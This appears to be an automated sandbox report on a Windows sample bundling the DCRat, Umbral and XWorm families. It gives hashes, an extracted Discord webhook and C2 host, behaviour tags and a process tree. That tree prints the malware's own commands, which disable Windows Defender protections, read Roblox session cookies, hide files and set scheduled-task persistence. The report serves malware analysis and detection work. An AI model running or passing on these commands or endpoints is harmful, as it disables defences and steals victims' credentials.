dcrat | aec009724ba208376f91cbfafd60db1e965f9016f17f14bfb3b074dde1f6ae28

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
17/05/2024, 20:41 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3969991942bb5b6130977411ae258ab8.exe
Size

19.8MB
MD5

3969991942bb5b6130977411ae258ab8
SHA1

c391e670488d73dc79c2acfab1e845d9c3e5227e
SHA256

aec009724ba208376f91cbfafd60db1e965f9016f17f14bfb3b074dde1f6ae28
SHA512

ce009d113cd85629cb744c0e30fecc9cb1f3bc353b546eab676604a3eec976c5f0dc60cb29b7f4841bb71bb7596128340d1b222408c9aeeb9f9671d1a1add00a
SSDEEP

393216:O581WtclJGQ9GnlC58mn3yJQjNKlgtcTuOYTmWYlY5nGPEy+tj7NJX:OeWgdGnlCqm3vKCTmpY5Py+r

Score

10^/10

dcrat umbral xworm execution infostealer rat spyware stealer trojan

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1221847080373584144/7stbODqa-C2IH_V1s7-AaD6fECqR68YLov_s341xewFGvFGlgl7fRFcAsV3CtRNlSgzQ

Extracted

Family

xworm

127.0.0.1:30683

operating-niger.gl.at.ply.gg:30683:30683

Attributes

Install_directory
%AppData%
install_file
XClient.exe

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0007000000023402-26.dat	family_umbral
behavioral2/memory/3768-27-0x0000027D57A80000-0x0000027D57AC0000-memory.dmp	family_umbral

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/files/0x000700000002340c-52.dat	family_xworm
behavioral2/memory/1816-61-0x00000000001F0000-0x0000000000206000-memory.dmp	family_xworm

Process spawned unexpected child process 36 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1272	4844	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1624	4844	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4592	4844	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1096	4844	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	452	4844	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4908	4844	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1144	4844	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4040	4844	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3304	4844	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1368	4844	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2220	4844	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2900	4844	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4956	4844	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3368	4844	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	748	4844	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4840	4844	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	672	4844	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3240	4844	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4220	4844	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	840	4844	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4964	4844	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4476	4844	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2896	4844	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4488	4844	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5100	4844	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3772	4844	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4932	4844	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1584	4844	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	460	4844	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1144	4844	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1172	4844	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4776	4844	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2888	4844	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	820	4844	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4792	4844	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2900	4844	schtasks.exe	95

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

DCRat payload 3 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral2/files/0x00090000000233fb-28.dat	dcrat
behavioral2/files/0x0007000000023406-94.dat	dcrat
behavioral2/memory/4404-97-0x0000000000CE0000-0x0000000000DB6000-memory.dmp	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4136	powershell.exe
4220	powershell.exe
1056	powershell.exe
3212	powershell.exe
4396	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	3969991942bb5b6130977411ae258ab8.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	t.bat
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	Nursultan (17).exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	LoaderMas.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	Chainprovider.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	LoaderMas.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	LoaderMas.exe

Executes dropped EXE 7 IoCs

pid	Process
2460	Nursultan (17).exe
3768	Umbral.exe
4552	t.bat
5016	Nursultan.exe
1816	LoaderMas.exe
4404	Chainprovider.exe
4932	StartMenuExperienceHost.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
31	discord.com
32	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
11	ip-api.com
23	ip-api.com

Drops file in Program Files directory 8 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Windows Defender\it-IT\55b276f4edf653	Chainprovider.exe
File created	C:\Program Files (x86)\Windows Portable Devices\csrss.exe	Chainprovider.exe
File created	C:\Program Files (x86)\Windows Portable Devices\886983d96e3d3e	Chainprovider.exe
File created	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\lsass.exe	Chainprovider.exe
File created	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\6203df4a6bafc7	Chainprovider.exe
File created	C:\Program Files\Windows Portable Devices\WmiPrvSE.exe	Chainprovider.exe
File created	C:\Program Files\Windows Portable Devices\24dbde2999530e	Chainprovider.exe
File created	C:\Program Files (x86)\Windows Defender\it-IT\StartMenuExperienceHost.exe	Chainprovider.exe

Drops file in Windows directory 6 IoCs

description	ioc	Process
File created	C:\Windows\bcastdvr\conhost.exe	Chainprovider.exe
File created	C:\Windows\bcastdvr\088424020bedd6	Chainprovider.exe
File created	C:\Windows\twain_32\StartMenuExperienceHost.exe	Chainprovider.exe
File created	C:\Windows\twain_32\55b276f4edf653	Chainprovider.exe
File created	C:\Windows\IdentityCRL\lsass.exe	Chainprovider.exe
File created	C:\Windows\IdentityCRL\6203df4a6bafc7	Chainprovider.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 36 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
1096	schtasks.exe
3368	schtasks.exe
4476	schtasks.exe
1144	schtasks.exe
4908	schtasks.exe
3240	schtasks.exe
4592	schtasks.exe
748	schtasks.exe
672	schtasks.exe
4220	schtasks.exe
4932	schtasks.exe
1584	schtasks.exe
1272	schtasks.exe
1144	schtasks.exe
3304	schtasks.exe
4840	schtasks.exe
4964	schtasks.exe
2888	schtasks.exe
2220	schtasks.exe
1624	schtasks.exe
1368	schtasks.exe
2896	schtasks.exe
4488	schtasks.exe
5100	schtasks.exe
460	schtasks.exe
452	schtasks.exe
2900	schtasks.exe
820	schtasks.exe
4792	schtasks.exe
2900	schtasks.exe
4040	schtasks.exe
4956	schtasks.exe
840	schtasks.exe
3772	schtasks.exe
1172	schtasks.exe
4776	schtasks.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2068	wmic.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	t.bat
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	Chainprovider.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3740	PING.EXE

Suspicious behavior: EnumeratesProcesses 39 IoCs

pid	Process
3768	Umbral.exe
3212	powershell.exe
3212	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
4404	Chainprovider.exe
4404	Chainprovider.exe
5016	Nursultan.exe
5016	Nursultan.exe
1516	powershell.exe
1516	powershell.exe
4396	powershell.exe
4396	powershell.exe
1516	powershell.exe
4396	powershell.exe
4404	Chainprovider.exe
4404	Chainprovider.exe
4324	powershell.exe
4324	powershell.exe
4324	powershell.exe
4136	powershell.exe
4136	powershell.exe
4404	Chainprovider.exe
4404	Chainprovider.exe
4136	powershell.exe
4220	powershell.exe
4220	powershell.exe
4220	powershell.exe
1056	powershell.exe
1056	powershell.exe
1056	powershell.exe
960	powershell.exe
960	powershell.exe
960	powershell.exe
1816	LoaderMas.exe
1816	LoaderMas.exe
4932	StartMenuExperienceHost.exe
4932	StartMenuExperienceHost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3768	Umbral.exe
Token: SeIncreaseQuotaPrivilege	2288	wmic.exe
Token: SeSecurityPrivilege	2288	wmic.exe
Token: SeTakeOwnershipPrivilege	2288	wmic.exe
Token: SeLoadDriverPrivilege	2288	wmic.exe
Token: SeSystemProfilePrivilege	2288	wmic.exe
Token: SeSystemtimePrivilege	2288	wmic.exe
Token: SeProfSingleProcessPrivilege	2288	wmic.exe
Token: SeIncBasePriorityPrivilege	2288	wmic.exe
Token: SeCreatePagefilePrivilege	2288	wmic.exe
Token: SeBackupPrivilege	2288	wmic.exe
Token: SeRestorePrivilege	2288	wmic.exe
Token: SeShutdownPrivilege	2288	wmic.exe
Token: SeDebugPrivilege	2288	wmic.exe
Token: SeSystemEnvironmentPrivilege	2288	wmic.exe
Token: SeRemoteShutdownPrivilege	2288	wmic.exe
Token: SeUndockPrivilege	2288	wmic.exe
Token: SeManageVolumePrivilege	2288	wmic.exe
Token: 33	2288	wmic.exe
Token: 34	2288	wmic.exe
Token: 35	2288	wmic.exe
Token: 36	2288	wmic.exe
Token: SeIncreaseQuotaPrivilege	2288	wmic.exe
Token: SeSecurityPrivilege	2288	wmic.exe
Token: SeTakeOwnershipPrivilege	2288	wmic.exe
Token: SeLoadDriverPrivilege	2288	wmic.exe
Token: SeSystemProfilePrivilege	2288	wmic.exe
Token: SeSystemtimePrivilege	2288	wmic.exe
Token: SeProfSingleProcessPrivilege	2288	wmic.exe
Token: SeIncBasePriorityPrivilege	2288	wmic.exe
Token: SeCreatePagefilePrivilege	2288	wmic.exe
Token: SeBackupPrivilege	2288	wmic.exe
Token: SeRestorePrivilege	2288	wmic.exe
Token: SeShutdownPrivilege	2288	wmic.exe
Token: SeDebugPrivilege	2288	wmic.exe
Token: SeSystemEnvironmentPrivilege	2288	wmic.exe
Token: SeRemoteShutdownPrivilege	2288	wmic.exe
Token: SeUndockPrivilege	2288	wmic.exe
Token: SeManageVolumePrivilege	2288	wmic.exe
Token: 33	2288	wmic.exe
Token: 34	2288	wmic.exe
Token: 35	2288	wmic.exe
Token: 36	2288	wmic.exe
Token: SeDebugPrivilege	1816	LoaderMas.exe
Token: SeDebugPrivilege	3212	powershell.exe
Token: SeDebugPrivilege	3692	powershell.exe
Token: SeDebugPrivilege	4404	Chainprovider.exe
Token: SeDebugPrivilege	1516	powershell.exe
Token: SeDebugPrivilege	4396	powershell.exe
Token: SeDebugPrivilege	4324	powershell.exe
Token: SeDebugPrivilege	4136	powershell.exe
Token: SeDebugPrivilege	4220	powershell.exe
Token: SeDebugPrivilege	1056	powershell.exe
Token: SeIncreaseQuotaPrivilege	1272	wmic.exe
Token: SeSecurityPrivilege	1272	wmic.exe
Token: SeTakeOwnershipPrivilege	1272	wmic.exe
Token: SeLoadDriverPrivilege	1272	wmic.exe
Token: SeSystemProfilePrivilege	1272	wmic.exe
Token: SeSystemtimePrivilege	1272	wmic.exe
Token: SeProfSingleProcessPrivilege	1272	wmic.exe
Token: SeIncBasePriorityPrivilege	1272	wmic.exe
Token: SeCreatePagefilePrivilege	1272	wmic.exe
Token: SeBackupPrivilege	1272	wmic.exe
Token: SeRestorePrivilege	1272	wmic.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1816	LoaderMas.exe

Suspicious use of WriteProcessMemory 59 IoCs

description	pid	Process	procid_target
PID 1288 wrote to memory of 2460	1288	3969991942bb5b6130977411ae258ab8.exe	87
PID 1288 wrote to memory of 2460	1288	3969991942bb5b6130977411ae258ab8.exe	87
PID 1288 wrote to memory of 4552	1288	3969991942bb5b6130977411ae258ab8.exe	88
PID 1288 wrote to memory of 4552	1288	3969991942bb5b6130977411ae258ab8.exe	88
PID 1288 wrote to memory of 4552	1288	3969991942bb5b6130977411ae258ab8.exe	88
PID 1288 wrote to memory of 3768	1288	3969991942bb5b6130977411ae258ab8.exe	90
PID 1288 wrote to memory of 3768	1288	3969991942bb5b6130977411ae258ab8.exe	90
PID 4552 wrote to memory of 4920	4552	t.bat	91
PID 4552 wrote to memory of 4920	4552	t.bat	91
PID 4552 wrote to memory of 4920	4552	t.bat	91
PID 3768 wrote to memory of 2288	3768	Umbral.exe	92
PID 3768 wrote to memory of 2288	3768	Umbral.exe	92
PID 3768 wrote to memory of 4464	3768	Umbral.exe	96
PID 3768 wrote to memory of 4464	3768	Umbral.exe	96
PID 3768 wrote to memory of 3212	3768	Umbral.exe	98
PID 3768 wrote to memory of 3212	3768	Umbral.exe	98
PID 2460 wrote to memory of 5016	2460	Nursultan (17).exe	94
PID 2460 wrote to memory of 5016	2460	Nursultan (17).exe	94
PID 2460 wrote to memory of 1816	2460	Nursultan (17).exe	100
PID 2460 wrote to memory of 1816	2460	Nursultan (17).exe	100
PID 3768 wrote to memory of 3692	3768	Umbral.exe	102
PID 3768 wrote to memory of 3692	3768	Umbral.exe	102
PID 4920 wrote to memory of 2796	4920	WScript.exe	104
PID 4920 wrote to memory of 2796	4920	WScript.exe	104
PID 4920 wrote to memory of 2796	4920	WScript.exe	104
PID 2796 wrote to memory of 4404	2796	cmd.exe	106
PID 2796 wrote to memory of 4404	2796	cmd.exe	106
PID 3768 wrote to memory of 1516	3768	Umbral.exe	107
PID 3768 wrote to memory of 1516	3768	Umbral.exe	107
PID 1816 wrote to memory of 4396	1816	LoaderMas.exe	113
PID 1816 wrote to memory of 4396	1816	LoaderMas.exe	113
PID 3768 wrote to memory of 4324	3768	Umbral.exe	133
PID 3768 wrote to memory of 4324	3768	Umbral.exe	133
PID 1816 wrote to memory of 4136	1816	LoaderMas.exe	140
PID 1816 wrote to memory of 4136	1816	LoaderMas.exe	140
PID 4404 wrote to memory of 1760	4404	Chainprovider.exe	151
PID 4404 wrote to memory of 1760	4404	Chainprovider.exe	151
PID 1760 wrote to memory of 1168	1760	cmd.exe	153
PID 1760 wrote to memory of 1168	1760	cmd.exe	153
PID 1816 wrote to memory of 4220	1816	LoaderMas.exe	154
PID 1816 wrote to memory of 4220	1816	LoaderMas.exe	154
PID 1816 wrote to memory of 1056	1816	LoaderMas.exe	156
PID 1816 wrote to memory of 1056	1816	LoaderMas.exe	156
PID 3768 wrote to memory of 1272	3768	Umbral.exe	160
PID 3768 wrote to memory of 1272	3768	Umbral.exe	160
PID 3768 wrote to memory of 3704	3768	Umbral.exe	162
PID 3768 wrote to memory of 3704	3768	Umbral.exe	162
PID 3768 wrote to memory of 4776	3768	Umbral.exe	164
PID 3768 wrote to memory of 4776	3768	Umbral.exe	164
PID 3768 wrote to memory of 960	3768	Umbral.exe	166
PID 3768 wrote to memory of 960	3768	Umbral.exe	166
PID 3768 wrote to memory of 2068	3768	Umbral.exe	168
PID 3768 wrote to memory of 2068	3768	Umbral.exe	168
PID 3768 wrote to memory of 4836	3768	Umbral.exe	171
PID 3768 wrote to memory of 4836	3768	Umbral.exe	171
PID 4836 wrote to memory of 3740	4836	cmd.exe	173
PID 4836 wrote to memory of 3740	4836	cmd.exe	173
PID 1760 wrote to memory of 4932	1760	cmd.exe	178
PID 1760 wrote to memory of 4932	1760	cmd.exe	178

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4464	attrib.exe

C:\Users\Admin\AppData\Local\Temp\3969991942bb5b6130977411ae258ab8.exe
"C:\Users\Admin\AppData\Local\Temp\3969991942bb5b6130977411ae258ab8.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1288
- C:\Users\Admin\AppData\Roaming\Nursultan (17).exe
  "C:\Users\Admin\AppData\Roaming\Nursultan (17).exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2460
- - C:\Users\Admin\AppData\Roaming\Nursultan.exe
    "C:\Users\Admin\AppData\Roaming\Nursultan.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:5016
- - C:\Users\Admin\AppData\Roaming\LoaderMas.exe
    "C:\Users\Admin\AppData\Roaming\LoaderMas.exe"
    3⤵
    - Checks computer location settings
    - Drops startup file
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1816
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\LoaderMas.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4396
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'LoaderMas.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4136
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4220
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1056
- C:\Users\Admin\AppData\Roaming\t.bat
  "C:\Users\Admin\AppData\Roaming\t.bat"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:4552
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\perfdhcpSvc\LUps3wjkA6jhdk7xRy8J55z2u.vbe"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:4920
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\perfdhcpSvc\mStUjP0ksX5N.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2796
    - - C:\perfdhcpSvc\Chainprovider.exe
        
        "C:\perfdhcpSvc\Chainprovider.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Program Files directory
        Drops file in Windows directory
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4404
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\OOOQfReeqn.bat"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1760
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        7⤵
        
        PID:1168
        
        C:\perfdhcpSvc\StartMenuExperienceHost.exe
        
        "C:\perfdhcpSvc\StartMenuExperienceHost.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:4932
- C:\Users\Admin\AppData\Roaming\Umbral.exe
  "C:\Users\Admin\AppData\Roaming\Umbral.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3768
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2288
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Roaming\Umbral.exe"
    3⤵
    - Views/modifies file attributes
    PID:4464
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Umbral.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3212
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3692
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1516
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4324
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1272
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:3704
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:4776
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:960
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2068
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Roaming\Umbral.exe" && pause
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4836
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      Runs ping.exe
      PID:3740

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\perfdhcpSvc\System.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1272

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\perfdhcpSvc\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1624

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\perfdhcpSvc\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4592

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Windows\bcastdvr\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1096

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\bcastdvr\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:452

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Windows\bcastdvr\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4908

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 13 /tr "'C:\perfdhcpSvc\OfficeClickToRun.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1144

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\perfdhcpSvc\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4040

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 13 /tr "'C:\perfdhcpSvc\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3304

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Nurik\WmiPrvSE.exe'" /f
1⤵
- Process spawned unexpected child process
